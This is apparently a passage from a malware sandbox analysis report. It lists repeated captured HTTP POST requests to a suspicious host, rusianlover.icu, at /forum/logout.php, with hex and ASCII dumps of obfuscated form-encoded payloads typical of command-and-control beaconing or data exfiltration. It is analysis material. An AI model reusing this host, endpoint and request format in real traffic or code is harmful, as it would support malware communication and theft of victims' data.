zejin=7FC1A19369651B8AD7AB3173412108DFBE4C0B361F474D7E7C5E6D&xadadgjgj=79642469&bipqxel=B8A87999BF7DACECE6F9F4E64DFB2435F487BCD234B0F03F00266113A1C2A4FA76687E63AB2D808EA04CB8DB708E0B8BB33128A743C824CAB954B746A5EBB98D5C665A456F43E4CC09239436F21BB777E3BB397C8B3AF4259CF54C232C3CC6E95E268FCF708D2464C7344053B9EFFB843AD4C89D2AA44890F20A12F57F8066AC1ACE885DA9AA58831601701C5865C000F46DBE1933F86D4476B396DCC4A72C650D2D26693FA312E83D004D94D68B8271A83EA2B957E4E88192F0A9D73444010FC7861D1BDB896621A5ABBAE802645D72D52A6BF9A78C377B2875E1E71432CE6E79FBFCB593D23DF16075A8FCAEA846B5A3EA985D2C2F7A4EB7E565A3AFEFEF06567205A1A99B01C0CBCC0FDC7C86FFF2977E970EFC1B43A022E7FEAEA101DBC0A39E9A5C
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?id=1106076 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 637Cache-Control: no-cacheData Raw: 73 71 6f 6d 6b 69 3d 38 65 30 62 38 33 64 33 35 62 64 38 32 35 61 65 32 66 37 34 37 33 26 71 6d 69 65 3d 37 38 31 33 37 37 33 36 26 75 75 75 75 75 75 75 75 3d 37 63 66 65 66 38 62 64 62 34 38 66 63 37 32 32 61 34 61 30 65 31 38 33 30 62 36 64 38 34 63 62 66 31 36 61 62 37 66 63 66 37 36 61 61 64 38 37 35 39 61 30 61 38 61 31 32 34 30 37 35 32 38 37 66 34 62 36 32 38 33 35 62 31 62 30 64 66 33 61 63 64 65 34 66 33 63 65 38 30 38 66 65 36 34 30 38 39 64 33 36 34 32 62 38 39 65 66 63 32 38 37 30 61 37 33 61 38 30 31 63 31 37 64 36 30 32 37 61 65 35 65 33 31 30 63 64 63 33 39 64 64 61 62 35 65 62 32 62 38 64 62 34 65 31 65 30 37 32 64 39 33 38 66 36 30 35 64 66 31 32 65 61 65 38 38 30 36 37 63 62 37 34 30 62 30 32 61 66 31 64 39 61 64 65 38 34 62 36 35 34 66 64 38 63 34 35 33 64 35 38 61 37 37 39 32 38 64 31 30 63 63 37 39 36 36 64 37 66 31 36 33 31 37 36 32 65 66 65 36 63 31 64 35 66 66 35 32 37 63 31 31 65 63 37 30 65 36 33 65 39 37 38 30 37 39 66 37 66 30 30 36 37 35 66 36 38 38 61 66 65 62 65 61 64 30 39 66 31 30 37 65 66 39 32 32 34 61 65 30 37 33 38 66 35 37 37 66 64 63 31 37 33 65 37 64 32 33 37 61 65 39 37 32 65 65 38 31 66 62 39 39 33 30 65 64 35 65 62 33 66 33 63 33 65 66 65 65 65 38 34 34 62 33 66 39 38 65 61 65 66 39 35 37 39 62 35 62 33 64 35 39 37 64 33 37 66 37 31 38 32 64 38 62 32 32 66 32 31 36 30 38 34 37 37 34 65 39 35 34 62 34 37 34 31 32 62 38 33 34 61 34 64 30 62 31 63 35 34 38 32 62 30 66 39 38 38 36 65 30 31 39 30 36 30 33 32 30 38 39 63 63 61 62 39 31 65 63 35 62 33 66 31 38 66 37 63 38 65 34 63 37 32 35 64 33 65 31 62 33 38 63 32 39 63 39 66 63 33 35 66 39 35 65 65 63 36 32 35 64 62 39 38 30 65 61 35 31 63 64 37 64 64 38 39 34 33 30 37 61 62 63 32 34 62 32 66 30 32 62 39 36 63 65 39 36 66 36 37 64 61 62 31 61 39 61 37 61 65 36 35 31 32 33 64 63 33 66 31 32 66 32 38 35 30 30 61 36 30 38 62 62 30 35 63 38 38 30 35 38 30 37 37 36 36 66 63 30 63 39 37 35 38 30 Data Ascii: sqomki=8e0b83d35bd825ae2f7473&qmie=78137736&uuuuuuuu=7cfef8bdb48fc722a4a0e1830b6d84cbf16ab7fcf76aad8759a0a8a124075287f4b62835b1b0df3acde4f3ce808fe64089d3642b89efc2870a73a801c17d6027ae5e310cdc39ddab5eb2b8db4e1e072d938f605df12eae88067cb740b02af1d9ade84b654fd8c453d58a77928d10cc7966d7f1631762efe6c1d5ff527c11ec70e63e978079f7f00675f688afebead09f107ef9224ae0738f577fdc173e7d237ae972ee81fb9930ed5eb3f3c3efeee844b3f98eaef9579b5b3d597d37f7182d8b22f216084774e954b47412b834a4d0b1c5482b0f9886e01906032089ccab91ec5b3f18f7c8e4c725d3e1b38c29c9fc35f95eec625db980ea51cd7dd894307abc24b2f02b96ce96f67dab1a9a7ae65123dc3f12f28500a608bb05c8805807766fc0c97580
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?id=3125771 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 665Cache-Control: no-cacheData Raw: 77 73 6f 6b 6d 69 3d 33 38 34 31 31 32 46 42 38 43 45 30 39 35 42 34 45 46 37 34 44 46 35 33 32 43 37 46 45 35 34 41 44 42 30 30 33 38 34 31 42 38 37 38 34 42 44 35 41 34 26 75 6f 69 63 3d 39 34 35 34 33 34 37 36 26 79 77 75 73 77 75 73 71 3d 34 37 44 39 45 31 39 44 31 39 42 43 30 37 45 33 42 43 41 30 42 41 37 31 39 42 31 42 45 30 46 32 31 45 43 36 33 33 31 30 34 30 46 39 38 46 43 46 32 34 30 42 33 34 46 46 38 30 36 44 34 43 37 39 36 31 31 35 33 34 45 43 41 36 41 35 39 44 46 33 39 34 33 39 46 41 46 38 45 42 31 33 34 41 32 33 37 32 42 42 37 43 30 33 30 32 41 37 38 33 32 42 37 42 42 43 45 32 38 42 35 36 39 37 38 30 39 44 30 37 31 35 35 33 44 31 35 36 45 39 36 44 42 42 45 32 38 46 39 35 42 30 30 45 35 41 41 43 30 32 43 39 38 35 41 30 35 33 34 33 41 34 44 35 36 33 36 43 32 35 37 35 38 43 42 31 38 38 36 34 43 35 38 44 38 33 42 43 33 46 34 33 45 38 33 39 32 38 32 41 38 42 45 46 45 37 46 37 36 31 46 34 41 37 36 43 38 42 42 33 36 42 35 30 37 34 36 46 31 39 31 30 36 37 39 39 46 30 30 32 30 36 46 38 31 33 36 36 32 33 36 37 33 43 31 45 44 38 43 43 41 45 35 45 39 37 34 39 39 32 33 31 46 30 31 37 45 45 44 36 45 34 34 43 43 36 31 34 44 34 42 43 35 34 32 43 39 32 45 37 35 32 41 31 32 44 43 46 32 35 36 41 42 38 30 39 31 32 44 39 32 38 42 37 43 42 41 36 31 32 31 39 38 31 38 41 30 46 34 31 35 39 42 32 44 44 32 34 42 43 46 39 41 39 36 37 43 44 39 45 36 37 36 45 43 39 46 31 34 46 41 46 38 32 35 46 31 45 45 37 42 45 39 46 36 46 44 45 44 32 38 43 37 35 34 31 30 31 34 34 32 32 37 32 37 31 46 30 31 31 35 33 43 41 30 44 45 31 31 43 39 32 46 45 46 33 34 35 46 42 42 41 37 44 35 46 46 39 35 34 43 33 45 45 34 38 33 33 43 34 42 30 45 45 36 38 39 32 45 38 41 33 32 43 46 31 39 44 38 31 36 45 30 36 34 45 44 30 46 43 36 42 36 36 39 32 45 45 35 37 46 33 43 35 45 30 32 36 43 31 34 43 34 42 45 37 32 31 46 43 37 37 41 32 39 39 35 42 42 33 31 39 34 39 35 31 33 45 37 42 41 36 43 34 31 34 35 34 30 43 37 32 41 31 43 30 38 34 41 39 33 31 39 35 31 42 33 39 45 46 38 33 30 42 35 31 37 35 38 46 42 30 41 33 Data Ascii: wsokmi=384112FB8CE095B4EF74DF532C7FE54ADB003841B8784BD5A4&uoic=94543476&ywuswusq=47D9E19D19BC07E3BCA0BA719B1BE0F21EC6331040F98FCF240B34FF806D4C79611534ECA6A59DF39439FAF8EB134A2372BB7C0302A7832B7BBCE28B5697809D071553D156E96DBBE28F95B00E5AAC02C985A05343A4D5636C25758CB18864C58D83BC3F43E839282A8BEFE7F761F4A76C8BB36B50746F19106799F00206F8136623673C1ED8CCAE5E97499231F017EED6E44CC614D4BC542C92E752A12DCF256AB80912D928B7CBA61219818A0F4159B2DD24BCF9A967CD9E676EC9F14FAF825F1EE7BE9F6FDED28C75410144227271F01153CA0DE11C92FEF345FBBA7D5FF954C3EE4833C4B0EE6892E8A32CF19D816E064ED0FC6B6692EE57F3C5E026C14C4BE721FC77A2995BB31949513E7BA6C414540C72A1C084A931951B39EF830B51758FB0A3
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 653Cache-Control: no-cacheData Raw: 6b 75 6b 75 3d 66 62 62 64 62 66 30 36 33 35 66 39 31 37 30 36 63 30 34 63 39 33 39 30 39 38 32 66 33 64 37 35 63 33 64 64 64 66 26 69 71 65 6d 61 69 77 65 3d 32 33 38 30 34 38 34 32 26 6d 79 71 63 75 67 3d 44 42 39 43 37 33 36 30 33 37 45 37 35 44 35 45 43 41 39 41 33 37 42 42 45 45 34 42 39 39 44 46 30 46 42 38 44 42 31 32 38 34 45 30 45 44 32 34 36 39 32 41 42 41 39 30 33 46 31 31 44 31 45 39 31 32 39 33 36 33 35 37 44 30 30 36 38 45 31 38 36 41 44 37 39 35 39 46 35 30 31 34 31 33 43 30 42 36 36 42 45 32 45 39 35 37 35 35 43 37 31 44 42 45 35 34 41 32 43 33 41 30 38 33 32 36 42 37 33 34 38 33 38 37 33 44 34 36 43 38 41 38 30 38 42 41 36 39 30 33 33 43 35 42 30 38 34 32 44 44 33 35 38 31 38 46 33 36 46 33 43 32 33 35 43 42 34 32 44 34 31 36 41 43 35 34 35 44 46 31 45 34 34 43 34 31 42 31 38 32 43 44 31 44 33 35 30 35 36 32 37 43 35 46 35 45 32 37 37 42 33 37 38 42 39 38 41 37 46 30 33 39 33 30 44 34 39 37 46 33 38 41 45 43 31 30 46 38 36 33 44 39 34 39 34 46 43 42 39 31 44 37 34 33 35 44 44 39 44 37 44 42 46 33 30 34 44 35 37 31 30 30 33 32 38 30 43 32 38 37 41 46 36 45 45 36 38 42 36 45 42 36 35 45 31 37 42 32 41 45 45 30 35 33 35 38 35 42 42 33 39 31 35 37 34 36 42 32 46 34 37 41 31 38 33 44 39 44 31 41 43 45 44 33 30 42 30 39 36 31 37 39 38 43 46 41 32 37 30 45 39 30 46 35 33 37 42 39 31 35 35 39 36 32 44 43 35 43 45 42 33 46 41 32 32 33 33 33 39 38 37 33 34 39 33 44 38 34 42 46 35 33 33 45 41 46 34 45 33 33 34 37 30 39 38 38 38 38 38 43 43 32 32 45 31 46 41 32 41 46 38 35 39 42 38 31 37 41 44 41 37 41 37 43 34 39 37 33 30 41 42 30 30 42 30 46 31 45 43 38 36 33 31 41 42 43 44 41 38 46 45 36 32 36 46 30 42 42 30 37 36 36 45 44 38 39 45 41 38 34 32 41 46 33 31 42 36 36 37 34 31 43 37 44 44 33 39 42 45 46 31 33 38 45 37 31 32 32 46 41 30 43 39 41 36 44 36 46 45 44 45 32 34 32 39 46 36 33 38 41 36 39 45 38 44 30 31 42 34 44 41 39 41 33 38 41 32 41 35 41 41 33 35 41 38 30 43 43 30 38 42 32 42 34 36 34 38 34 46 37 37 43 34 44 Data Ascii: kuku=fbbdbf0635f91706c04c9390982f3d75c3dddf&iqemaiwe=23804842&myqcug=DB9C736037E75D5ECA9A37BBEE4B99DF0FB8DB1284E0ED24692ABA903F11D1E912936357D0068E186AD7959F501413C0B66BE2E95755C71DBE54A2C3A08326B73483873D46C8A808BA69033C5B0842DD35818F36F3C235CB42D416AC545DF1E44C41B182CD1D3505627C5F5E277B378B98A7F03930D497F38AEC10F863D9494FCB91D7435DD9D7DBF304D571003280C287AF6EE68B6EB65E17B2AEE053585BB3915746B2F47A183D9D1ACED30B0961798CFA270E90F537B9155962DC5CEB3FA223339873493D84BF533EAF4E33470988888CC22E1FA2AF859B817ADA7A7C49730AB00B0F1EC8631ABCDA8FE626F0BB0766ED89EA842AF31B66741C7DD39BEF138E7122FA0C9A6D6FEDE2429F638A69E8D01B4DA9A38A2A5AA35A80CC08B2B46484F77C4D
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?pid=567 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 646Cache-Control: no-cacheData Raw: 6c 63 74 6b 62 73 6a 3d 32 32 30 39 31 38 33 35 26 6e 67 7a 73 6c 65 78 71 6a 3d 37 64 30 64 38 35 35 38 38 66 65 66 31 62 66 65 65 61 36 63 64 30 63 34 64 62 36 32 26 70 6b 66 61 76 3d 35 35 31 61 62 31 31 64 63 37 63 33 35 62 61 62 39 35 38 32 33 37 62 61 63 30 39 64 31 66 32 32 66 62 33 33 39 36 61 38 31 34 66 62 38 65 64 64 36 65 66 32 62 34 38 34 61 64 30 61 37 32 37 39 34 33 36 32 31 62 34 38 61 66 36 39 34 32 61 30 35 35 61 37 39 38 63 62 36 36 61 33 63 61 34 38 33 63 63 64 65 30 32 37 31 66 32 36 35 62 38 64 33 38 61 64 30 31 33 32 39 66 39 38 63 39 30 30 36 33 32 30 65 32 30 32 39 32 32 30 66 63 62 38 36 61 38 66 61 33 36 37 39 34 62 33 65 33 39 36 31 65 35 61 33 34 39 65 31 35 63 63 39 33 62 35 31 34 30 34 62 31 32 65 39 37 33 62 38 32 36 32 64 33 66 38 37 65 35 34 34 39 35 35 63 35 38 32 64 32 36 32 33 66 33 31 39 34 39 34 65 39 31 30 63 37 38 30 32 38 38 62 36 64 61 39 34 35 39 37 66 65 39 37 31 33 33 38 65 31 33 63 66 31 35 65 66 31 34 35 34 37 34 62 65 64 35 33 39 33 31 66 35 63 33 30 66 34 38 62 38 34 64 35 62 35 34 61 64 35 38 33 37 32 63 36 32 37 64 65 34 62 61 31 62 36 39 37 30 36 65 31 64 39 38 35 34 31 38 38 33 64 30 38 33 32 34 33 30 33 65 66 35 31 32 31 63 36 38 63 30 33 39 62 36 30 34 34 38 37 37 38 37 31 39 66 32 37 65 37 64 64 34 38 38 31 63 63 32 31 62 32 31 30 30 35 37 62 36 36 36 34 65 36 37 32 33 66 33 65 32 37 66 36 35 31 31 33 36 38 35 65 33 32 31 64 66 30 66 31 62 32 30 63 62 63 61 32 32 36 35 62 35 31 36 32 63 64 61 62 37 33 37 61 39 33 34 64 36 35 39 39 32 36 34 31 37 37 31 62 39 65 61 65 64 65 31 66 61 35 39 37 64 39 32 35 30 32 37 37 31 30 62 33 38 38 37 64 35 31 35 37 38 39 31 62 62 31 31 36 36 39 37 39 66 31 61 65 36 34 62 36 38 35 35 65 35 64 32 63 36 65 36 38 39 62 63 64 34 66 62 39 35 64 37 34 33 65 32 61 64 61 65 66 35 63 34 62 39 62 65 62 34 32 66 34 35 33 65 37 30 35 65 63 35 62 39 31 32 34 62 31 31 62 35 30 38 30 31 61 65 32 64 36 33 65 65 34 62 31 64 39 32 34 Data Ascii: lctkbsj=22091835&ngzslexqj=7d0d85588fef1bfeea6cd0c4db62&pkfav=551ab11dc7c35bab958237bac09d1f22fb3396a814fb8edd6ef2b484ad0a727943621b48af6942a055a798cb66a3ca483ccde0271f265b8d38ad01329f98c9006320e2029220fcb86a8fa36794b3e3961e5a349e15cc93b51404b12e973b8262d3f87e544955c582d2623f319494e910c780288b6da94597fe971338e13cf15ef145474bed53931f5c30f48b84d5b54ad58372c627de4ba1b69706e1d98541883d08324303ef5121c68c039b60448778719f27e7dd4881cc21b210057b6664e6723f3e27f65113685e321df0f1b20cbca2265b5162cdab737a934d65992641771b9eaede1fa597d925027710b3887d5157891bb1166979f1ae64b6855e5d2c6e689bcd4fb95d743e2adaef5c4b9beb42f453e705ec5b9124b11b50801ae2d63ee4b1d924
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 672Cache-Control: no-cacheData Raw: 7a 65 64 69 68 6d 6c 71 70 3d 32 34 36 32 31 31 39 37 26 62 69 6a 71 72 3d 31 63 36 35 36 38 63 30 62 35 62 65 38 31 35 38 35 61 34 66 61 64 38 65 35 38 39 38 33 63 63 66 36 34 38 32 35 30 62 30 66 33 33 32 34 64 33 61 35 31 62 31 34 38 26 64 6d 70 79 62 6b 6e 3d 31 34 36 32 34 41 34 39 41 41 33 45 44 43 37 46 32 44 41 34 37 39 35 33 37 30 46 35 38 33 39 39 35 43 46 44 38 33 35 31 41 45 30 41 35 31 43 37 33 30 38 43 34 36 46 41 34 37 32 34 41 34 38 30 32 46 42 31 46 32 42 34 46 42 39 46 35 42 31 44 35 34 45 45 45 34 39 41 44 42 43 30 31 36 45 31 30 46 30 45 32 45 37 36 43 45 39 32 45 39 46 46 42 45 38 31 33 39 36 37 43 43 34 34 32 41 39 42 39 46 30 37 32 44 36 38 32 38 39 45 44 45 44 35 39 35 39 32 43 32 38 31 34 37 43 33 39 44 32 41 34 37 30 37 37 30 46 45 30 30 35 44 39 33 34 32 30 35 34 37 35 37 42 38 44 31 35 42 35 34 46 42 37 41 43 45 37 43 43 35 33 38 32 35 46 31 32 38 35 35 41 45 46 34 32 38 35 44 34 39 35 45 44 35 38 45 39 44 39 33 45 38 30 42 36 35 41 32 39 31 35 43 36 34 33 39 33 32 33 46 32 42 45 32 43 32 33 45 44 39 38 32 30 35 34 33 46 39 31 43 44 45 30 34 37 31 44 43 37 37 34 34 39 43 39 44 31 36 44 34 35 36 46 42 32 30 46 39 42 44 37 34 41 44 31 39 35 35 31 37 31 39 46 33 31 45 46 44 31 30 33 32 42 32 38 36 38 31 46 37 46 46 42 33 41 36 34 30 42 30 37 42 33 43 45 30 33 37 31 41 42 43 35 30 38 38 30 46 39 31 41 46 41 32 39 36 32 32 44 31 44 43 36 45 38 41 36 39 38 34 36 39 37 30 45 37 35 37 30 45 39 42 46 32 33 38 33 33 37 32 45 41 45 43 36 32 35 35 44 35 45 31 43 39 35 45 44 45 42 32 31 38 39 45 36 35 33 32 35 32 45 41 31 41 30 33 42 45 31 37 30 32 36 31 45 39 41 37 32 33 34 35 41 31 35 43 31 32 46 42 38 36 44 36 38 31 31 42 35 46 31 43 33 33 37 46 34 42 44 41 41 43 37 39 42 42 41 42 41 46 32 35 41 37 33 43 43 44 32 42 38 44 38 31 42 30 34 43 38 33 44 34 38 34 35 41 41 31 45 45 44 42 30 41 38 36 46 37 41 37 38 39 36 32 30 34 44 33 32 37 32 34 30 46 36 32 41 43 43 35 35 35 34 43 36 35 37 43 32 36 31 41 45 42 43 45 34 42 43 41 45 33 30 41 30 34 36 36 37 34 45 44 44 34 Data Ascii: zedihmlqp=24621197&bijqr=1c6568c0b5be81585a4fad8e58983ccf648250b0f3324d3a51b148&dmpybkn=14624A49AA3EDC7F2DA4795370F583995CFD8351AE0A51C7308C46FA4724A4802FB1F2B4FB9F5B1D54EEE49ADBC016E10F0E2E76CE92E9FFBE813967CC442A9B9F072D68289EDED59592C28147C39D2A470770FE005D9342054757B8D15B54FB7ACE7CC53825F12855AEF4285D495ED58E9D93E80B65A2915C6439323F2BE2C23ED9820543F91CDE0471DC77449C9D16D456FB20F9BD74AD19551719F31EFD1032B28681F7FFB3A640B07B3CE0371ABC50880F91AFA29622D1DC6E8A69846970E7570E9BF2383372EAEC6255D5E1C95EDEB2189E653252EA1A03BE170261E9A72345A15C12FB86D6811B5F1C337F4BDAAC79BBABAF25A73CCD2B8D81B04C83D4845AA1EEDB0A86F7A7896204D327240F62ACC5554C657C261AEBCE4BCAE30A046674EDD4
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?id=9292886 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 655Cache-Control: no-cacheData Raw: 66 6b 76 61 66 3d 31 39 36 61 39 66 31 38 32 35 62 30 32 37 39 61 62 66 33 65 35 31 34 64 35 63 31 31 62 37 33 39 65 66 63 36 66 36 26 64 67 70 73 76 65 68 6b 74 3d 38 33 30 36 30 35 37 26 68 6f 62 69 70 63 6a 3d 35 38 66 31 35 33 33 62 63 38 33 66 62 32 38 33 66 65 64 32 34 63 66 37 36 64 65 38 37 62 63 62 65 39 36 36 39 36 62 35 63 30 61 38 34 32 30 63 37 38 37 63 35 30 30 63 34 64 63 63 61 30 62 39 39 66 61 33 30 39 38 63 34 62 32 34 35 61 36 66 30 33 31 66 66 61 38 35 39 31 64 66 64 61 63 37 37 37 61 37 33 30 35 61 61 65 36 66 38 61 39 34 62 66 62 62 62 35 35 62 63 36 32 66 64 65 65 65 35 36 35 33 66 32 37 66 34 63 35 32 66 66 66 31 66 30 33 65 30 64 63 63 38 66 39 34 33 63 35 36 31 39 36 32 30 31 39 32 39 32 37 64 37 63 37 66 31 33 30 33 34 62 33 34 65 63 33 63 34 30 32 31 33 39 35 62 63 33 37 31 65 63 65 64 63 37 65 31 36 61 66 64 65 31 39 35 63 34 35 63 64 63 38 66 64 61 63 34 64 37 61 35 35 32 36 66 65 33 64 63 31 62 64 38 37 65 36 33 61 39 38 66 66 31 32 63 37 32 65 63 38 32 35 65 62 61 39 35 38 35 31 38 62 33 38 31 33 63 38 39 31 63 32 61 39 37 34 34 30 39 35 34 37 62 31 65 62 32 65 32 35 37 37 37 30 63 64 33 36 39 65 64 37 31 34 62 32 63 62 37 33 61 32 34 31 66 34 64 30 62 36 31 65 64 36 34 65 32 33 31 32 34 30 63 38 64 61 66 36 66 33 34 61 65 30 37 32 33 66 64 39 36 63 61 39 38 31 39 39 64 31 64 62 30 34 30 35 35 35 66 31 66 66 33 63 63 37 65 34 35 61 38 63 39 64 33 33 31 66 34 32 39 64 39 31 39 63 64 65 30 37 62 34 66 32 31 61 35 63 64 31 34 66 37 61 36 38 35 31 39 32 63 37 38 64 37 38 63 37 37 63 35 38 66 66 34 30 61 33 62 34 38 32 36 34 36 37 61 66 34 63 36 33 32 37 38 65 37 63 32 61 39 34 37 30 63 61 30 66 37 30 38 36 34 37 34 39 65 61 38 66 66 35 32 32 33 66 32 36 62 64 62 65 63 32 64 39 65 30 34 33 61 32 30 37 36 62 66 62 61 35 38 65 35 32 63 36 32 32 33 39 61 65 32 32 63 61 61 30 34 39 32 35 64 31 38 36 37 33 35 31 63 37 37 35 30 33 65 34 33 32 34 37 34 33 31 34 64 32 36 30 63 39 32 62 34 65 30 62 63 37 61 39 33 Data Ascii: fkvaf=196a9f1825b0279abf3e514d5c11b739efc6f6&dgpsvehkt=8306057&hobipcj=58f1533bc83fb283fed24cf76de87bcbe96696b5c0a8420c787c500c4dcca0b99fa3098c4b245a6f031ffa8591dfdac777a7305aae6f8a94bfbbb55bc62fdeee5653f27f4c52fff1f03e0dcc8f943c5619620192927d7c7f13034b34ec3c4021395bc371ecedc7e16afde195c45cdc8fdac4d7a5526fe3dc1bd87e63a98ff12c72ec825eba958518b3813c891c2a974409547b1eb2e257770cd369ed714b2cb73a241f4d0b61ed64e231240c8daf6f34ae0723fd96ca98199d1db040555f1ff3cc7e45a8c9d331f429d919cde07b4f21a5cd14f7a685192c78d78c77c58ff40a3b4826467af4c63278e7c2a9470ca0f70864749ea8ff5223f26bdbec2d9e043a2076bfba58e52c62239ae22caa04925d1867351c77503e432474314d260c92b4e0bc7a93
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 641Cache-Control: no-cacheData Raw: 73 6b 63 75 3d 61 66 39 61 30 30 39 64 31 31 32 38 31 65 65 61 39 30 32 32 39 33 64 36 39 31 26 71 67 77 6d 63 73 69 79 3d 39 38 31 31 38 34 30 36 26 75 6f 69 63 77 71 3d 34 62 65 36 34 38 66 30 36 62 33 64 31 62 36 37 30 30 35 39 38 32 39 66 63 37 32 38 64 66 35 63 65 65 63 33 31 63 31 37 35 64 65 61 63 33 31 32 37 66 39 38 65 39 63 62 30 61 36 30 65 32 36 66 36 63 36 63 31 38 38 34 33 39 35 39 31 32 61 64 38 64 62 32 36 65 62 64 39 31 39 36 30 32 33 64 39 35 62 35 39 64 61 38 62 65 62 38 35 35 62 62 62 30 63 37 30 32 33 32 34 66 37 63 66 65 66 62 66 36 36 65 31 34 65 35 32 62 34 34 37 66 65 36 34 64 62 32 63 64 34 30 36 34 64 34 31 65 39 61 31 61 38 37 39 30 30 66 64 62 62 64 38 33 36 32 61 62 36 62 33 64 39 65 39 65 30 32 36 63 34 30 32 37 37 30 64 61 64 62 65 32 30 35 63 38 61 66 61 65 38 64 36 61 38 31 34 63 66 30 64 37 37 32 34 34 61 36 30 62 34 35 63 32 37 62 62 61 62 65 61 32 62 36 62 33 65 38 61 36 30 64 66 37 33 33 39 65 62 32 66 62 30 37 31 36 32 34 64 65 38 61 33 61 33 34 38 33 64 64 64 34 32 38 30 64 33 33 65 32 31 36 63 33 30 62 39 34 35 61 36 30 32 64 65 65 64 36 65 66 30 62 32 65 36 38 61 31 31 30 38 33 34 30 35 63 64 30 36 30 65 66 62 31 64 64 61 33 30 30 64 38 66 65 36 36 64 62 63 31 35 32 64 34 38 35 63 30 62 30 37 66 64 32 64 34 36 64 63 30 65 33 66 30 36 32 37 39 39 39 39 31 64 33 33 38 30 62 63 32 37 65 32 35 33 65 34 35 31 31 35 31 32 31 64 38 37 32 37 61 31 31 61 30 31 33 66 39 32 66 33 36 65 30 66 35 38 33 65 65 64 64 36 37 33 62 33 61 36 66 32 37 62 36 32 39 31 32 35 34 38 33 35 36 61 32 61 39 30 36 64 38 31 35 66 39 62 33 33 34 62 66 31 65 38 33 31 61 62 37 64 35 30 35 32 62 32 65 35 61 63 36 61 33 37 30 34 39 31 66 64 62 30 38 37 61 35 61 39 38 32 32 30 63 61 63 39 63 64 62 36 63 38 39 65 35 32 32 30 63 32 61 37 33 61 33 30 30 66 34 39 36 31 33 37 39 39 62 33 61 63 62 38 36 34 66 31 35 38 33 65 64 65 65 65 36 32 38 66 61 37 65 64 30 65 66 39 61 32 35 30 32 34 66 Data Ascii: skcu=af9a009d11281eea902293d691&qgwmcsiy=98118406&uoicwq=4be648f06b3d1b670059829fc728df5ceec31c175deac3127f98e9cb0a60e26f6c6c1884395912ad8db26ebd9196023d95b59da8beb855bbb0c702324f7cfefbf66e14e52b447fe64db2cd4064d41e9a1a87900fdbbd8362ab6b3d9e9e026c402770dadbe205c8afae8d6a814cf0d77244a60b45c27bbabea2b6b3e8a60df7339eb2fb071624de8a3a3483ddd4280d33e216c30b945a602deed6ef0b2e68a11083405cd060efb1dda300d8fe66dbc152d485c0b07fd2d46dc0e3f062799991d3380bc27e253e45115121d8727a11a013f92f36e0f583eedd673b3a6f27b62912548356a2a906d815f9b334bf1e831ab7d5052b2e5ac6a370491fdb087a5a98220cac9cdb6c89e5220c2a73a300f49613799b3acb864f1583edeee628fa7ed0ef9a25024f
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?id=8085154 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 671Cache-Control: no-cacheData Raw: 65 6f 73 63 67 71 3d 39 32 37 39 39 32 35 34 26 67 73 79 6b 71 63 69 75 3d 32 39 41 35 41 46 39 32 33 45 43 33 36 36 33 44 46 39 46 34 46 31 36 36 33 33 39 30 38 31 39 46 31 39 41 43 46 37 32 39 44 46 31 33 32 42 42 31 30 41 44 30 34 42 32 38 26 69 77 65 73 3d 64 35 34 66 33 32 31 62 36 31 61 35 30 30 64 61 32 34 30 31 65 38 30 34 61 36 38 31 36 61 38 36 37 61 62 39 62 37 63 37 65 37 64 36 62 33 65 34 64 66 30 31 30 37 32 64 38 39 64 31 62 39 37 63 65 31 61 62 61 32 64 36 36 33 30 64 33 38 32 62 35 66 30 38 38 64 34 38 33 66 62 64 34 34 34 61 38 65 34 34 30 65 61 64 63 34 38 33 65 32 62 36 61 31 64 36 31 36 34 65 39 34 39 39 64 61 34 61 33 65 33 63 30 39 38 34 64 32 65 64 62 63 66 62 33 35 62 66 35 38 39 30 61 39 33 65 30 32 38 61 39 33 30 62 61 33 36 39 35 30 32 35 32 33 62 37 65 36 35 62 66 65 32 38 63 33 66 35 63 36 30 63 32 63 64 31 31 30 65 66 34 39 34 61 33 37 64 65 39 31 61 33 36 64 64 31 65 63 36 62 66 61 32 63 32 34 35 65 63 64 65 37 63 30 65 38 61 32 61 35 30 30 33 62 36 32 34 36 37 63 35 66 65 63 30 36 32 62 63 62 31 63 37 38 61 65 38 66 64 32 38 34 66 61 66 39 32 39 32 66 30 31 64 62 31 65 65 38 30 64 62 36 61 38 37 35 38 65 65 61 33 64 34 38 34 38 39 63 36 34 39 35 66 62 37 39 31 30 64 66 61 33 39 39 61 63 32 32 61 39 39 63 39 39 37 62 33 35 36 33 38 34 64 63 31 35 39 30 37 34 31 64 35 62 66 38 38 65 62 31 63 31 62 65 65 35 32 32 65 65 62 35 30 36 34 31 39 63 66 38 37 30 35 31 35 33 62 37 65 31 64 64 63 38 36 36 35 36 66 32 35 34 61 36 31 64 64 64 38 35 65 33 38 38 39 61 35 39 37 66 33 63 31 63 34 62 31 35 64 37 33 37 38 39 39 31 39 65 